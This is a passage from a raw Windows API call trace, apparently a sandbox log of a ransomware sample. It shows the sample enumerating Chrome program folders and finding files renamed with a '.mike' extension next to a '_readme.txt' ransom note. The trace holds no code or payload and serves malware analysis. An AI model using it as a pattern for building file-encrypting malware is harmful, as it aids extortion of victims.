dwReserved1=0x0, cFileName="logocanary.png.mike", cAlternateFileName="LOGOCA~1.MIK")) returned 1 [0114.378] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd747800, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0xd747800, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0xd747800, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x2120, dwReserved0=0x0, dwReserved1=0x0, cFileName="smalllogo.png.mike", cAlternateFileName="SMALLL~1.MIK")) returned 1 [0114.378] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd76d960, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0xd76d960, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0xd76d960, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x20d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="smalllogocanary.png.mike", cAlternateFileName="SMALLL~2.MIK")) returned 1 [0114.378] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6fb540, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0xd6fb540, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0xd76d960, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0114.378] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6fb540, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0xd6fb540, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0xd76d960, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0114.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0114.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0114.379] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.379] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.379] CoTaskMemFree (pv=0x508980) [0114.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.379] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm", lpFilePart=0x0) returned 0x4a [0114.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0114.380] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d9a09c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.380] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9a09c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff3db415, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x3b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0114.380] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d78b680, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d78b680, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_platform_specific", cAlternateFileName="_PLATF~1")) returned 1 [0114.381] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d78b680, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d78b680, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_platform_specific", cAlternateFileName="_PLATF~1")) returned 0 [0114.381] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0114.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0114.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0114.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0114.381] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d9a09c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.382] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9a09c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff3db415, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x3b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0114.382] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d78b680, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d78b680, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_platform_specific", cAlternateFileName="_PLATF~1")) returned 1 [0114.383] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0114.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0114.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0114.383] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.383] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.383] CoTaskMemFree (pv=0x508980) [0114.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.383] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific", lpFilePart=0x0) returned 0x5d [0114.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0114.384] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d78b680, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d78b680, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.384] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="win_x64", cAlternateFileName="")) returned 1 [0114.384] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="win_x64", cAlternateFileName="")) returned 0 [0114.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0114.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0114.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0114.385] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d78b680, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7d78b680, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.385] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="win_x64", cAlternateFileName="")) returned 1 [0114.385] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0114.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0114.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0114.386] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.386] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.386] CoTaskMemFree (pv=0x508980) [0114.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.386] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64", lpFilePart=0x0) returned 0x65 [0114.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0114.388] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.388] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9a09c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff57cc70, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x440df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="widevinecdm.dll", cAlternateFileName="WIDEVI~1.DLL")) returned 1 [0114.388] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9c6b20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9c6b20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff588fc5, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x665, dwReserved0=0x0, dwReserved1=0x0, cFileName="widevinecdm.dll.sig", cAlternateFileName="WIDEVI~1.SIG")) returned 1 [0114.388] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x77b158ce, ftLastWriteTime.dwHighDateTime=0x1d2c8a4, nFileSizeHigh=0x0, nFileSizeLow=0x43b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="widevinecdmadapter.dll", cAlternateFileName="WIDEVI~2.DLL")) returned 1 [0114.388] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x77c6cdf8, ftLastWriteTime.dwHighDateTime=0x1d2c8a4, nFileSizeHigh=0x0, nFileSizeLow=0x57f, dwReserved0=0x0, dwReserved1=0x0, cFileName="widevinecdmadapter.dll.sig", cAlternateFileName="WIDEVI~2.SIG")) returned 1 [0114.389] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0114.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0114.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0114.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0114.391] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.391] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9a09c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9a09c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff57cc70, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x440df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="widevinecdm.dll", cAlternateFileName="WIDEVI~1.DLL")) returned 1 [0114.391] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d9c6b20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d9c6b20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff588fc5, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x665, dwReserved0=0x0, dwReserved1=0x0, cFileName="widevinecdm.dll.sig", cAlternateFileName="WIDEVI~1.SIG")) returned 1 [0114.391] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x77b158ce, ftLastWriteTime.dwHighDateTime=0x1d2c8a4, nFileSizeHigh=0x0, nFileSizeLow=0x43b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="widevinecdmadapter.dll", cAlternateFileName="WIDEVI~2.DLL")) returned 1 [0114.391] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x77c6cdf8, ftLastWriteTime.dwHighDateTime=0x1d2c8a4, nFileSizeHigh=0x0, nFileSizeLow=0x57f, dwReserved0=0x0, dwReserved1=0x0, cFileName="widevinecdmadapter.dll.sig", cAlternateFileName="WIDEVI~2.SIG")) returned 1 [0114.392] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x77c6cdf8, ftLastWriteTime.dwHighDateTime=0x1d2c8a4, nFileSizeHigh=0x0, nFileSizeLow=0x57f, dwReserved0=0x0, dwReserved1=0x0, cFileName="widevinecdmadapter.dll.sig", cAlternateFileName="WIDEVI~2.SIG")) returned 0 [0114.392] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0114.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0114.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0114.393] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.393] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.393] CoTaskMemFree (pv=0x508980) [0114.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.393] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics", lpFilePart=0x0) returned 0x3d [0114.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0114.394] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f252e00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f252e00, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.394] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e110e80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7e110e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7e110e80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1ab8, dwReserved0=0x0, dwReserved1=0x0, cFileName="20170605115313.pma", cAlternateFileName="201706~1.PMA")) returned 1 [0114.394] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0114.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0114.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0114.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0114.395] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f252e00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f252e00, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.395] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e110e80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7e110e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7e110e80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1ab8, dwReserved0=0x0, dwReserved1=0x0, cFileName="20170605115313.pma", cAlternateFileName="201706~1.PMA")) returned 1 [0114.395] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e110e80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7e110e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7e110e80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1ab8, dwReserved0=0x0, dwReserved1=0x0, cFileName="20170605115313.pma", cAlternateFileName="201706~1.PMA")) returned 0 [0114.395] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0114.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0114.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0114.396] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0114.396] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0114.396] CoTaskMemFree (pv=0x508980) [0114.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0114.396] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\CrashReports", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | 